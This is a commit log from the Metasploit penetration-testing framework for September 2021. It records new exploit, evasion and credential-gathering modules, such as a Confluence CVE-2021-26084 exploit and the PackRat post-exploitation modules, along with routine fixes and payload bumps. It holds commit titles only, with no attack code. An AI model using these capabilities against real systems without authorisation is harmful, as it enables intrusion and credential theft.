Spencer McIntyre 2db5764700 Add WebSocket frame and opcode specs, fix bugs 2021-09-29 17:55:05 -04:00
Spencer McIntyre ac319e730b Document the new WebSocket functionality 2021-09-29 17:55:05 -04:00
Spencer McIntyre d230090e0d Add a WebSocket channel 2021-09-29 17:55:05 -04:00
Spencer McIntyre c0635a0532 Add a wsloop that handles frags, pings and closes 2021-09-29 17:55:05 -04:00
Spencer McIntyre 7e8afcdaf6 Add a WebSocket implementation for Rex 2021-09-29 17:55:05 -04:00
Grant Willcox d846f8e929 Land #15721, Support Pivoted SSL Connections 2021-09-29 16:36:20 -05:00
Grant Willcox bad1b579f6 Land #15722, Add tab completion for exploit rerun command 2021-09-29 11:30:52 -05:00
Metasploit 25c1164adc automatic module_metadata_base.json update 2021-09-29 11:29:14 -05:00
bwatters 14a5ce11d2 Land #15720, Fix #15717, replacing 'RHOSTS' with 'rhost'
Merge branch 'land-15720' into upstream-master
2021-09-29 11:10:59 -05:00
Metasploit 1ae6bda2f5 automatic module_metadata_base.json update 2021-09-29 10:37:57 -05:00
adfoster-r7 967e5382c5 Add tab completion for exploit rerun command 2021-09-29 16:33:31 +01:00
bwatters 6c4d948d87 Land # 15719, Update payloads version to 2.0.58
Merge branch 'update-payloads-2.0.58' into upstream-master
2021-09-29 10:19:44 -05:00
Spencer McIntyre aee113b490 Bump the rex-core gem to 0.1.18 2021-09-29 11:13:31 -04:00
Spencer McIntyre 0887188e12 Synchronize the initsock routine
This prevents the socket from being closed while negotiating SSL
2021-09-29 11:13:31 -04:00
Spencer McIntyre a5a5bfcbad Support pivoted SSL client channels 2021-09-29 11:13:31 -04:00
bwatters b354ea7f58 Update python payload cached sizes 2021-09-29 09:34:16 -05:00
NeffIsBack 0873d4db19 Fix #15717, replacing 'RHOSTS' with 'rhost'
As seen in the json file the `RHOSTS` parameter, which is set in Metasploit, is passed as `rhost` to the python script. Therefore `RHOSTS` is not a valid index in the `args` json file, causing the python script to crash as seen in #15717.

`{
   "WORKSPACE":"",
   "VERBOSE":"false",
   "THREADS":"1",
   "ShowProgress":"true",
   "ShowProgressPercent":"10",
   "targeturi":"/RDWeb/Pages/en-US/login.aspx",
   "rport":"443",
   "domain":"",
   "username":"********",
   "password":"",
   "timeout":"1250",
   "enum_domain":"true",
   "verify_service":"true",
   "user_agent":"Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0",
   "UNPARSED_RHOSTS":"***.***.***.***",
   "**rhost**":"***.***.***.***"
}`
2021-09-29 15:49:09 +02:00
bwatters 2fb37e9a8b Update payloads version to 2.0.58 2021-09-28 14:38:53 -05:00
Metasploit 2d20435a03 automatic module_metadata_base.json update 2021-09-28 13:37:19 -05:00
adfoster-r7 26e317d093 Land #15707, Add ECU Hard Reset for hwbridge 2021-09-28 19:18:46 +01:00
adfoster-r7 230c7b5e82 Remove repeatable session metadata 2021-09-28 18:51:51 +01:00
Metasploit d1d680ed02 automatic module_metadata_base.json update 2021-09-28 10:14:58 -05:00
Tim W 4289c8b3ea Land #15441, add date filtering to stdapi_fs_search 2021-09-28 15:55:43 +01:00
Tim W dd76fe4d07 update payload cached sizes 2021-09-28 15:30:17 +01:00
Tim W 91ed7fac4a bump metasploit-payloads to 2.0.57 and mettle to 1.0.13 2021-09-28 15:27:53 +01:00
Metasploit 4df1c0adb8 automatic module_metadata_base.json update 2021-09-27 14:45:29 -05:00
bwatters 5d96725ce6 Land #15200, PackRat post exploitation modules based on a common mixin
Merge branch 'land-update-15200' into upstream-master
2021-09-27 14:26:02 -05:00
Jack Heysel 8f36d677c2 Land #15703, Fix Compiling Encrypted Payloads Mac
This fixes compiling encrypted payloads on MacOS.
This also adds an advanced option, ShowCompileCMD,
that will print the compilation command used.
Thanks @space-r7!
2021-09-27 13:53:51 -04:00
bwatters ded4401b2b More rubocop fixes.... 2021-09-27 12:34:07 -05:00
bwatters 082948f8d9 Fix references to new global and fix a forgotten module 2021-09-27 12:26:53 -05:00
bwatters 6e08c6087e Rubocop corrections 2021-09-27 12:26:53 -05:00
Kazuyoshi Maruta 2818fc88d1 Fix typo 2021-09-27 12:26:53 -05:00
Kazuyoshi Maruta 77e144b668 Add a method to check if the folder containing the artifact exists 2021-09-27 12:26:53 -05:00
Kazuyoshi Maruta 0d021deb0c Update modules with rubocop 2021-09-27 12:26:53 -05:00
Kazuyoshi Maruta e6d2c01ad2 Run Rubocop for aim.rb 2021-09-27 12:26:53 -05:00
KazuCyber aa9598cd20 Rename ICQ.rb to icq.rb 2021-09-27 12:26:53 -05:00
Kazuyoshi Maruta 32d45c07fe Add xchat.md 2021-09-27 12:26:53 -05:00
Kazuyoshi Maruta 09ed5b671e Add xchat.rb, Add kmeleon.md 2021-09-27 12:26:53 -05:00
KazuCyber 81719f6613 Update aim.rb
Bug fix.
2021-09-27 12:26:52 -05:00
Kazuyoshi Maruta 37cc6e540e Add modules, Rename a module 2021-09-27 12:26:52 -05:00
Kazuyoshi Maruta 7e615276a8 Remove duplicate 2021-09-27 12:26:52 -05:00
Kazuyoshi Maruta c1742a23b9 Update wording on Module documentation. Replace EXTRACT_CREDENTIALS_FROM_FILE with EXTRACT_DATA 2021-09-27 12:26:52 -05:00
Kazuyoshi Maruta 6a8782f388 Update module documentation. 2021-09-27 12:26:52 -05:00
Kazuyoshi Maruta e582c15f56 Update &amp; and & to 'and' 2021-09-27 12:26:52 -05:00
Kazuyoshi Maruta 01202ff63b Update download function name in packrat.rb 2021-09-27 12:26:52 -05:00
Kazuyoshi Maruta cc50f75a09 Update line.md 2021-09-27 12:26:52 -05:00
Kazuyoshi Maruta 94d3f87461 Update artifact description in line.rb 2021-09-27 12:26:52 -05:00
KazuCyber 858c05b476 Update documentation/modules/post/windows/gather/credentials/aim.md
Co-authored-by: Brendan <bwatters@rapid7.com>
2021-09-27 12:26:52 -05:00
Kazuyoshi Maruta 852f50d159 Relocate Packrat mixin 2021-09-27 12:26:52 -05:00
Kazuyoshi Maruta e893f4fdb7 Modify output message 2021-09-27 12:26:52 -05:00
Kazuyoshi Maruta 98b5e8bb68 Rename option name within Packrat 2021-09-27 12:26:52 -05:00
Kazuyoshi Maruta dc6f6a8f25 Packrat: 29 post exploitation modules 2021-09-27 12:26:52 -05:00
Metasploit 327cbc4e0d automatic module_metadata_base.json update 2021-09-27 12:04:02 -05:00
Grant Willcox a7b57e9e66 Land #15709, Bump metasploit-payloads to 2.0.56 and mettle to 1.0.12 2021-09-27 11:41:46 -05:00
Metasploit 912ff89256 automatic module_metadata_base.json update 2021-09-27 09:52:34 -05:00
Tim W de398ae61f update payload cached sizes 2021-09-27 15:31:14 +01:00
Tim W 1b69b9fdc1 bump metasploit-payloads to 2.0.56 and mettle to 1.0.12 2021-09-27 15:31:09 +01:00
adfoster-r7 959527a4c4 Land #15669, Add meterpreter compatibility metadata to screenshare module 2021-09-27 15:18:01 +01:00
adfoster-r7 55be868f0e Land #15713, Update references to railgun to be consistent 2021-09-27 15:17:34 +01:00
Jay Turla 70c400e883 Update ecu_hard_reset.rb 2021-09-27 19:39:06 +08:00
adfoster-r7 06762d0934 Update references to railgun to be consistent 2021-09-27 12:37:14 +01:00
Jay Turla 9dc315094c Update ecu_hard_reset.rb 2021-09-27 19:30:36 +08:00
Jay Turla 05703c1918 Update ecu_hard_reset.md 2021-09-27 19:19:46 +08:00
Jay Turla 0cc6b9b9ba Merge branch 'patch-28' of https://github.com/shipcod3/metasploit-framework into patch-28 2021-09-27 19:12:43 +08:00
Jay Turla f60c492cf1 Add ECU Hard Reset for hwbridge 2021-09-27 18:58:39 +08:00
Jay Turla 03cdeacda4 Update ecu_hard_reset.rb 2021-09-27 17:22:16 +08:00
Jay Turla 5983fe89b2 Update ecu_hard_reset.rb 2021-09-27 17:16:13 +08:00
Jay Turla 631501865f Update ecu_hard_reset.rb 2021-09-27 16:50:09 +08:00
Jay Turla 31262ef807 Update ecu_hard_reset.rb 2021-09-25 11:12:34 +08:00
Spencer McIntyre ebfbf712b0 Updated Creating Metasploit Framework LoginScanners (markdown) 2021-09-24 16:38:52 -04:00
Spencer McIntyre c719907e8e Updated Creating Metasploit Framework LoginScanners (markdown) 2021-09-24 16:35:29 -04:00
Metasploit a87649a7b6 automatic module_metadata_base.json update 2021-09-24 15:20:16 -05:00
Jack Heysel b7f7c30f2b Land #15594, a wordpress scanner enhancement
This adds options to the wordpress scanner to allow the user
to only scan for plugins or themes that metasploit has
modules for.
2021-09-24 15:51:07 -04:00
space-r7 756fac4921 Land #15677, add Netgear auth bypass 2021-09-24 14:44:34 -05:00
Metasploit 56e052dfed automatic module_metadata_base.json update 2021-09-24 14:38:51 -05:00
Jack Heysel 7c7f8b8404 Land #15630, add DB_SKIP_EXISTING to AuthBrute
Adds the option DB_SKIP_EXISTING to the AuthBrute
mixin to give users the option to skip credentials
already in the database. Thanks @zeroSteiner!
2021-09-24 15:13:09 -04:00
Tim W f096102e1c add test case to search for an exact modified date 2021-09-24 18:58:39 +01:00
jheysel-r7 3b12461e9e Merge branch 'master' into feat/db-skip 2021-09-24 12:01:30 -04:00
Jay Turla 2091f9c715 Update ecu_hard_reset.rb 2021-09-24 23:50:25 +08:00
Grant Willcox 6ed3462517 Add in public data for stolen wifi credentials and cleanup code for the file we have to write for the telnet auxiliary module to work 2021-09-24 10:44:10 -05:00
Jay Turla b84f05c5ef Update ecu_hard_reset.rb 2021-09-24 23:41:29 +08:00
Jay Turla bfc78dc67c Update ecu_hard_reset.rb 2021-09-24 23:20:51 +08:00
Jay Turla b5daf312e4 Update ecu_hard_reset.rb 2021-09-24 23:15:34 +08:00
Jay Turla b672d0246e Update ecu_hard_reset.rb 2021-09-24 22:59:39 +08:00
Jay Turla a38f27d157 Create ecu_hard_reset.rb 2021-09-24 22:50:44 +08:00
Ashley Donaldson 2784ce88c1 Use correct property of listener_sock 2021-09-24 20:47:06 +10:00
Ashley Donaldson 3dec024fbd When listing sessions and jobs, note whether they are dependent on TCP forwarding 2021-09-24 20:30:57 +10:00
h00die 7df1aa1429 update doc 2021-09-23 21:44:53 -04:00
h00die 674a4ab9b6 update permissions 2021-09-23 21:42:02 -04:00
kalba-security 6b4aa25490 Add Meterpreter support via Linux target with ARCH_ARMLE and cmdstager 2021-09-23 18:26:13 -04:00
Grant Willcox 9deffb1848 Fix up a bug and resolve Christophe's review comments 2021-09-23 16:45:15 -05:00
adfoster-r7 e81f1b5687 Gracefully fallback to sesion.ui.screenshot when espia is not supported 2021-09-23 21:10:40 +01:00
space-r7 4b646c1886 add linker option to pin image base
also add advanced option to display
command used in compiling encrypted payloads
2021-09-23 14:59:18 -05:00
Grant Willcox 061240367d Push up changes to support saving WiFi credentials captured to the database, as well as to fix issues noticed during the review process 2021-09-23 13:31:27 -05:00
Metasploit a05e2ab52a Bump version of framework to 6.1.8 2021-09-23 12:06:01 -05:00
Metasploit 9a77aad8b4 automatic module_metadata_base.json update 2021-09-23 09:41:25 -05:00
space-r7 64f7581c97 Land #15686, OptRegexp default should be string 2021-09-23 09:22:45 -05:00
Christophe De La Fuente d3eff6fc14 Land #15600, Fixes issues with encrypted payloads by moving session bootstrap logic 2021-09-23 16:14:10 +02:00
Tim W ca8094d1b8 fix dir on powershell sessions 2021-09-23 13:29:31 +01:00
Tim W 4d3dda67ea fix msftidy 2021-09-23 13:02:17 +01:00
Tim W 30f1a0cd7b add documentation 2021-09-23 13:02:17 +01:00
Tim W 18015e5a0e add support for powershell sessions 2021-09-23 13:02:17 +01:00
Tim W d3a372e92b add support for shell sessions 2021-09-23 13:02:17 +01:00
Tim W fad8aef5f7 add support for 404 and 500 if files are inaccessible 2021-09-23 13:02:17 +01:00
Tim W fdea8bb805 add module to access a sessions filesystem in a browser 2021-09-23 13:02:17 +01:00
Tim W f540c2ad8f move get_drives to file mixin 2021-09-23 13:02:17 +01:00
A Galway cae29ccc2e PR Cleanup 2021-09-23 11:56:34 +01:00
kalba-security af98d56e17 Update credits to add PoC 2021-09-23 06:22:39 -04:00
kalba-security 0d42c36655 Specify that newer versions may still be vulnerable as no patch has been confirmed by the vendor 2021-09-23 05:19:07 -04:00
kalba-security b81d44020a Add Aerohive NetConfig 10.0r8a LFI and log poisoning to RCE module and docs 2021-09-23 04:57:48 -04:00
Grant Willcox 2ac4c71537 Add 'keep_cookies' => 'true' to requests so that we don't have to juggle cookies. Also make file write binary to comply with RuboCop 2021-09-22 17:02:24 -05:00
Grant Willcox 1ca075fb4f Fix up RuboCop issues 2021-09-22 14:06:06 -05:00
Grant Willcox d4474b0706 Add in refined XPATH searches to module, ability to automatically get a session, improved error handling, documenation for module, and general improvements 2021-09-22 14:01:49 -05:00
Metasploit 32306a3fb4 automatic module_metadata_base.json update 2021-09-22 10:21:22 -05:00
Spencer McIntyre cd0e0e4fb4 Land #15697, NTLM parsing refactor 2021-09-22 10:57:28 -04:00
Spencer McIntyre 072911f996 Land #15696, Display computer information from NLA 2021-09-22 10:42:23 -04:00
Metasploit 1c6344f799 automatic module_metadata_base.json update 2021-09-22 09:37:36 -05:00
Spencer McIntyre 6acdced3f0 Land #15506, Add evasion module syscall_inject 2021-09-22 10:17:13 -04:00
Spencer McIntyre 48b76e6149 Revert a change that caused a bug
Using the capital W in Windows.h would raise a fatal error when
compiling.
2021-09-22 09:55:17 -04:00
Ashley Donaldson 0279c572a1 Fixed rubocop warnings in ntlm_info_enumeration module 2021-09-22 15:44:19 +10:00
Ashley Donaldson 5fda1d40f3 Refactored NTLM parsing to use the rubyntlm library 2021-09-22 15:37:22 +10:00
Ashley Donaldson bd6bfd7d70 Fixed rubocop warnings for the modified module 2021-09-22 15:05:53 +10:00
Ashley Donaldson 2349393ef0 Display computer information gleaned from NTLM handshake in RDP. 2021-09-22 12:09:19 +10:00
Metasploit 9fa6b600b1 automatic module_metadata_base.json update 2021-09-21 16:01:12 -05:00
Spencer McIntyre ca6f957de0 Land #15632, Winrm improvements 2021-09-21 16:43:24 -04:00
Metasploit c16e796cc8 automatic module_metadata_base.json update 2021-09-21 14:31:53 -05:00
space-r7 b24b6d8063 Land #15695, fix crash / add logging nmap module 2021-09-21 14:13:11 -05:00
dwelch-r7 7856a88790 Land #15684, Improve interactive shell performance for pasted user input 2021-09-21 11:43:24 +01:00
Ashley Donaldson 9d8193150f Allow running a shell command separately to the currently interactive shell 2021-09-21 19:12:49 +10:00
Metasploit 998e1dbb25 automatic module_metadata_base.json update 2021-09-20 21:53:08 -05:00
adfoster-r7 c86f52a3ec Land #15679, bug fix for tomcat_mgr_upload module not undeploying app after exploit 2021-09-21 03:34:43 +01:00
adfoster-r7 ed72ca217a Improve setuid nmap module 2021-09-21 01:47:59 +01:00
space-r7 7fa880f066 Land #15666, meterp download w/ utf-8 2021-09-20 17:04:03 -05:00
adfoster-r7 9804cbe6db Updated Using Metasploit (markdown) 2021-09-20 22:07:25 +01:00
Metasploit 665bebfacd automatic module_metadata_base.json update 2021-09-20 12:34:16 -05:00
space-r7 fee037ac18 Land #15670, add opmanager sumpdu deser module 2021-09-20 12:15:26 -05:00
space-r7 327aefd3f5 add older path, fix typo 2021-09-20 12:14:42 -05:00
Jeffrey Martin 731b3d5ffe OptRegExp default value as string representation
OptRegExp default should be string to utilize in a Regex.
This allows for the object to serialize in metadata and via
rpc bridge when transimiteed using msgpack.
2021-09-17 16:34:46 -05:00
adfoster-r7 9574100760 Improve interactive shell performance 2021-09-17 11:43:28 +01:00
Grant Willcox 4181602047 Even more RuboCop changes, this time to add in the Notes section 2021-09-16 17:25:27 -05:00
Ashley Donaldson 91d0a6cc55 Re-auth after the session times out
This seems to happen after 8 hours. WinRM doesn't like having bodies
in the authentication requests, so we force the HTTP client to send
an empty one first
2021-09-17 07:32:18 +10:00
Grant Willcox 72df696d4e Add in method to enable telnet, further cleanup for Rubocop 2021-09-16 16:11:19 -05:00
Spencer McIntyre 4bccc0541f Add a note about exploitable versions 2021-09-16 17:08:23 -04:00
Grant Willcox 381f561f24 Use vars_get in send_request_cgi to be more proper and comply with Rubocop rules 2021-09-16 14:51:23 -05:00
Spencer McIntyre fd0f565095 Add automatic targeting for the CVEs 2021-09-16 15:15:52 -04:00
Metasploit b7fd61c92a automatic module_metadata_base.json update 2021-09-16 13:25:16 -05:00
Grant Willcox f9c683132c Improve the password reporting code to use more updated function create_credential_login instead 2021-09-16 13:03:29 -05:00
space-r7 12af64c4d8 Land #15604, add buffer overflow G-Cam module 2021-09-16 13:02:57 -05:00
Grant Willcox e9bd10faef Fix up broken module and RuboCop errors so we actually have functional code 2021-09-16 12:40:58 -05:00
Grant Willcox 810fa6be6e Change module name to lowercase snakecase, update attribution to conform to standards, store captured creds in database 2021-09-16 12:30:08 -05:00
Metasploit 8ceab1259c Bump version of framework to 6.1.7 2021-09-16 12:05:04 -05:00
Spencer McIntyre 9f971e8716 Update the module for CVE-2021-3287 2021-09-16 12:58:30 -04:00
Jeffrey Martin 4c005ebc91 use archive links for 4.19.0 2021-09-16 08:01:08 -05:00
Your Name a2f83c22ba Add Pattern Create 2021-09-16 08:22:57 +01:00
Naveen Sunkavally d1da74d329 bug fix to undeploy app after exploit 2021-09-15 21:54:21 -04:00
bf9114 ce273138c6 Merge pull request #1 from timwr/fix_15441
cleanup
2021-09-15 20:37:19 -04:00
Grant Willcox 2e5fc391c7 Add in initial writeup of netgear_PNPX_GetShareFolderList_auth_bypass.rb 2021-09-15 15:31:47 -05:00
Metasploit e9510cb4e0 automatic module_metadata_base.json update 2021-09-15 14:13:18 -05:00
Spencer McIntyre 56cd43a8b8 Land #15624, Add module for CVE-2020-27955 2021-09-15 14:54:19 -04:00
Metasploit 99b846396a automatic module_metadata_base.json update 2021-09-15 12:55:43 -05:00
space-r7 c491687b78 Land #14631, add Jira user enum module 2021-09-15 12:37:17 -05:00
space-r7 c151937226 Update versions tested and vulnerable versions 2021-09-15 12:35:34 -05:00
adfoster-r7 6072382666 Add session warnings on new lies 2021-09-15 17:43:05 +01:00
adfoster-r7 39ca4660a9 Add meterpreter compatibility metadata to screenshare module 2021-09-15 17:34:57 +01:00
adfoster-r7 88bf1ac3de Land #15675, fix the module info command to display the description field 2021-09-15 17:17:52 +01:00
jheysel-r7 eee079af24 Merge pull request #2 from smcintyre-r7/pr/collab/15624
Fixup issues from testing
2021-09-15 11:53:08 -04:00
space-r7 50301f9045 rubocop changes 2021-09-15 10:30:07 -05:00
Tim W ddd1d37d4b fix module description 2021-09-15 16:25:18 +01:00
space-r7 1dedffded1 use array for user names, skip empty user names 2021-09-15 09:29:40 -05:00
Metasploit b5080bcca5 automatic module_metadata_base.json update 2021-09-15 09:19:48 -05:00
adfoster-r7 56c875934e Land #15674, Fixing a problem where the module reported failure but actually succeeded 2021-09-15 15:02:04 +01:00
Spencer McIntyre fb74888a31 Correct the CVE reference 2021-09-15 08:42:55 -04:00
Robin fcf48c5817 Fixing a problem where the module reported failure but actually
succeeded
2021-09-15 10:59:03 +01:00
Spencer McIntyre 1bd3a764a6 Fixup issues from testing 2021-09-14 16:32:25 -04:00
Metasploit b598339e98 automatic module_metadata_base.json update 2021-09-14 13:27:38 -05:00
Spencer McIntyre 480dec9a1e Land #15658, Add module for CVE-2021-32682 2021-09-14 14:09:27 -04:00
space-r7 278807be98 check contents of json after attempted upload 2021-09-14 11:36:28 -05:00
Metasploit a5d9cbe78f automatic module_metadata_base.json update 2021-09-14 10:41:28 -05:00
Tim W f881e91787 Land #15667, fix file operations and post/test/file for powershell_reverse_tcp payloads 2021-09-14 16:18:56 +01:00
Grant Willcox cec3a4bc46 Land #15601, Add Geutebruck Post Exploitation Module 2021-09-14 10:03:21 -05:00
Tim W 27e09e0898 fix #15662, fix meterpreter download of utf8 filenames 2021-09-14 14:30:10 +01:00
Spencer McIntyre d82ed7d4a2 Write up the module docs 2021-09-14 09:10:44 -04:00
Spencer McIntyre 3986707895 Add and test the remaining targets 2021-09-14 09:10:44 -04:00
Spencer McIntyre d640866b68 Apply rubocop changes and fix all targets 2021-09-14 09:10:44 -04:00
Spencer McIntyre d4834631c3 Add the generated YSoSerial gadget chain 2021-09-14 09:10:44 -04:00
Spencer McIntyre 4e28d3df8f Update the YSoSerial Dockerfile and remove runme
Remove the runme script because we should no longer be updating all of
the gadget chains at once because doing so would require that quite a
few different modules be updated. Moving forward we should be updating
individual chains using an incremental approach to allow us to validate
the results of the find_ysoserial_offsets tool which is error prone.
2021-09-14 09:10:44 -04:00
Spencer McIntyre 521975976b Update find_ysoserial_offsets
* Apply rubocop suggestions for style
* Support patching an existing JSON file
* Use an OptionParser
2021-09-14 09:10:44 -04:00
Spencer McIntyre 6b90582864 Fix the diff-lcs v1.4+ bug 2021-09-14 09:10:44 -04:00
Spencer McIntyre 02fde3ac51 Initial work on CVE-2021-3287 2021-09-14 09:10:44 -04:00
bwatters 07204dc99e Rubocop -A 2021-09-14 07:41:45 -05:00
bwatters ddebdbc770 Remove some debug prints I left in 2021-09-14 07:41:45 -05:00
bwatters 51c4c9bd4e Update file library and file test module to work correctly
- added file append
- changed powershell commands to script-style (they seem to work much better)
- cleaned out use of string literals for filenames in test module
2021-09-14 07:41:45 -05:00
adfoster-r7 5ea21d74fb Land #15671, Remove activemq assertion from integration tests 2021-09-14 09:59:47 +01:00
adfoster-r7 d83918bfcb Remove activemq assertion from integration tests 2021-09-14 02:15:16 +01:00
Metasploit b26b4262c3 automatic module_metadata_base.json update 2021-09-13 09:42:13 -05:00
adfoster-r7 1499b1988e Land #15609, Add Meterpreter compatibility commands 2021-09-13 15:21:03 +01:00
A Galway ed6ef51f64 demotes no db message from error to warning 2021-09-13 11:06:45 +01:00
Metasploit a481986c66 automatic module_metadata_base.json update 2021-09-13 04:17:06 -05:00
adfoster-r7 7bbda9c51c Land #15659, Run Rubocop layout rules on modules 2021-09-13 09:58:59 +01:00
Ashley Donaldson 5dceb48553 Fixed rubocop issues 2021-09-13 11:40:03 +10:00
kensh1ro c1868d94cd add base64 encoding to shellcode 2021-09-12 17:00:24 +03:00
Ashley Donaldson 44455fd165 Added some comments for clarity 2021-09-12 19:38:16 +10:00
Ashley Donaldson 4f8e435e69 Handle upgrading to Meterp on Windows 2012 command shell via WinRM
These shells appear not to reflect input back to the user, which messes with
assumptions when it comes to parsing them out. So we utilise the code that
determines whether reflection is happening on Windows too.
2021-09-12 17:10:09 +10:00
kensh1ro 4454a7600a add minor fixes to module code 2021-09-10 22:56:04 +03:00
A Galway 81a86379d7 handles unverified shells & warns db/mingw not installed 2021-09-10 17:56:08 +01:00
Ashley Donaldson 16af8ad028 Honour the timeout parameter for reading from the shell 2021-09-10 22:39:27 +10:00
adfoster-r7 46718e3390 Run Rubocop layout rules on modules 2021-09-10 12:53:39 +01:00
Hynek Petrak eaed5d30c7 Allow authenticated user creation 2021-09-10 12:42:20 +02:00
Ashley Donaldson 12546865de Support Ctrl+C now we're using Command Shell rather than Powershell 2021-09-10 18:15:43 +10:00
Ashley Donaldson 50e31917da Emulate a stream to make the base command shell happy 2021-09-10 17:45:08 +10:00
Ashley Donaldson 0927737948 Adapted WinRM module logging to MSF logging
Separated WinRM module into separate files
2021-09-10 15:54:50 +10:00
space-r7 91ae50eb27 escapeshellcmd -> escapeshellarg 2021-09-09 17:28:05 -05:00
Ashley Donaldson b0e1502c86 Implemented suggestions from code review
- Use a literal hash
- Comment meaning of NTLM transforms
- store loot with data ready to go, to keep database in sync with file
2021-09-10 08:25:25 +10:00
space-r7 0095613a94 add completed module and documentation 2021-09-09 16:58:40 -05:00
Ashley Donaldson 5cffa86e30 Removed unused code 2021-09-10 07:46:05 +10:00
Ashley Donaldson cf09d56be0 Support re-authentication during the shell
After 8 hours, the server requests re-authentication, so need to support that.
2021-09-10 07:41:31 +10:00
adfoster-r7 e923cc308f Rename 2021-09-09 21:11:23 +01:00
adfoster-r7 477fc900f0 Consolidate label documentation 2021-09-09 21:09:07 +01:00
Tim W 4228f071ca add tests for file.search 2021-09-09 19:32:18 +01:00
Metasploit e577de41d4 Bump version of framework to 6.1.6 2021-09-09 12:06:10 -05:00
A Galway 4a3fb6920e adds cmd_shell initial output reading to bootstrap 2021-09-09 16:34:21 +01:00
adfoster-r7 bd4d794e14 Remove dead link 2021-09-09 15:55:30 +01:00
adfoster-r7 63c59cc0bd Destroyed Rex Layout (markdown) 2021-09-09 15:53:37 +01:00
Ashley Donaldson 9ea3be903d Just use cmd, as powershell <= 3.0 doesn't actually use stdout/stderr 2021-09-09 22:40:43 +10:00
Ashley Donaldson c33b850ff8 Support terminating processes early by sending a Ctrl+C signal 2021-09-09 22:08:33 +10:00
Tim W 9d2065fee5 cleanup 2021-09-09 10:02:22 +01:00
Ashley Donaldson 51a8c834c3 Support Windows 2012 and earlier 2021-09-09 18:05:29 +10:00
Metasploit 2dd089329a automatic module_metadata_base.json update 2021-09-08 18:07:57 -05:00
Grant Willcox 17f4bbfaec Land #15278, Add OUTFILE and DATABASE options to zoomeye_search and enhance output saved 2021-09-08 17:50:00 -05:00
Grant Willcox 7d3d57817f Add in final changes so that we verify what we insert into the database more and only insert valid formats of data, and then also update the documentation accordingly 2021-09-08 17:27:53 -05:00
Grant Willcox 8057b63329 Add in documentation for various scenarios, fix up another database error, and also improve error handling of invalid responses from the server 2021-09-08 17:27:51 -05:00
Grant Willcox d813e82fa3 Fix up saving data to the database so we have all the necessary info, fix web search to save all IPs discovered and fix up a connection issue encountered during testing 2021-09-08 17:27:49 -05:00
Yvain Douard 3ba0d5e3be facets outfile 2021-09-08 17:27:48 -05:00
Grant Willcox e1cfc8d956 Bring documentation in line with standards and also update the module to fix a bug and to make it more conformant 2021-09-08 17:27:46 -05:00
Jeffrey Martin 67be4a6519 add zoomeye_search documentation 2021-09-08 17:27:44 -05:00
Owein 9de8ad8108 with web search and possible lists of results: do not use newline to list it but pass the list as is to the table 2021-09-08 17:27:43 -05:00
Owein 8ab247066c facets will work, a little listing of options' values in the readme won't hurt. 2021-09-08 17:27:41 -05:00
Owein 1686e98d6e was missing the function for writing to a file.
rid of a loop that we didn't want.
2021-09-08 17:27:40 -05:00
Owein d49405df34 zoomeye more comprehensive output 2021-09-08 17:27:38 -05:00
adfoster-r7 059e39a6f0 Specify meterpreter compatibility command requirements 2021-09-08 22:59:25 +01:00
Grant Willcox 8cb2583039 Land #15654, Fully receive stage - Encrypted Payloads 2021-09-08 16:29:50 -05:00
Metasploit 0609e20f66 automatic module_metadata_base.json update 2021-09-08 16:15:46 -05:00
Jack Heysel 77e8de5881 Land #15645, Add Confluence OGNL exploit module.
Merge branch 'land-15645' into upstream-master
2021-09-08 16:51:06 -04:00
bwatters d5fee988be Land #15560, Add a binary safe write_file method for powershell session type
Merge branch 'land-15560' into upstream-master
2021-09-08 14:07:44 -05:00
Metasploit 62fbbf44fd automatic module_metadata_base.json update 2021-09-08 13:04:05 -05:00
bwatters f5a8c7e918 Add missing end 2021-09-08 12:53:41 -05:00
Spencer McIntyre 3443345417 Land #15655, Cleanup rbmysql options 2021-09-08 13:44:53 -04:00
adfoster-r7 f1ec12cb7e Cleanup rbmysql options 2021-09-08 15:51:21 +01:00
William Vu 5ed5bc3903 Add module doc 2021-09-08 09:37:02 -05:00
space-r7 9879593598 wait for all data when receiving stage 2021-09-08 09:31:03 -05:00
William Vu 8c4e5d262c Add Atlassian Confluence CVE-2021-26084 exploit 2021-09-08 06:57:31 -05:00
Ashley Donaldson 2f0509f2b5 Modified shell to a PowerShell shell
This also resolves a bug with the session not upgrading to meterpreter
2021-09-08 08:19:43 +10:00
Ashley Donaldson 3acddf75b4 Suggested changes from code review
* Report socket info
* Use existing Event class
* Remove debugging prints
* Comment obscure constant
2021-09-08 07:36:59 +10:00
Grant Willcox e557d40181 Land #15652, add pip3 to docker image support 2021-09-07 14:43:36 -05:00
Metasploit d27adde909 automatic module_metadata_base.json update 2021-09-07 14:20:35 -05:00
bwatters cfc3930405 Land #15634, Add DFLAG_BIG_CREATION to capability flags for erlang_cookie_rce.rb
Merge branch 'land-15634' into upstream-master
2021-09-07 14:00:49 -05:00
Grant Willcox 149c9f150d Land #15651, Remove ruby3 label automation 2021-09-07 13:51:55 -05:00
Jeffrey Martin 2954bde97d add pip3 to docker image support 2021-09-07 13:48:29 -05:00
Jack Heysel abbb994dab Updated docs 2021-09-07 13:55:21 -04:00
Jack Heysel e30ccafd86 Refeactor lfs.rb, revert rubocop changes on library files 2021-09-07 13:43:10 -04:00
Jack Heysel 7fe44583fe Updated docs 2021-09-07 13:32:52 -04:00
Metasploit 69a86fc276 automatic module_metadata_base.json update 2021-09-07 12:16:56 -05:00
bwatters a7d99ebbfc Land # 15611, ProxyShell Improvements
Merge branch 'land-15611' into upstream-master
2021-09-07 11:47:13 -05:00
adfoster-r7 3c6dc6dba7 Remove ruby3 label automation 2021-09-07 14:53:16 +01:00
Ashley Donaldson b8e98ca99c Increase responsiveness of WinRM shell, while also reducing number of requests sent.
Achieved by either waiting N seconds, or immediately after stdin is sent.
While we were sending them every 2 seconds, we could sometimes be held up
waiting for a stdout response before we could even send our stdin message.
2021-09-07 14:59:12 +10:00
Ashley Donaldson e6dba1a84a Ignore channel binding on HTTP 2021-09-07 10:58:18 +10:00
Ashley Donaldson ea0925f877 Support Extended Protection for Authentication 2021-09-07 10:31:01 +10:00
adfoster-r7 63c63806c8 Cleanup markdown uses 2021-09-07 00:59:05 +01:00
adfoster-r7 ba9605a7f3 Fix Go formatting 2021-09-06 23:28:10 +01:00
test 044a9d3ad2 Clarified variable names 2021-09-06 15:46:05 -04:00
adfoster-r7 90e7793132 Use relative markdown links instead of absolute 2021-09-06 19:30:38 +01:00
adfoster-r7 98d7df3acd Use kramdown flavored markdown instead of github flavored markdown 2021-09-06 19:22:01 +01:00
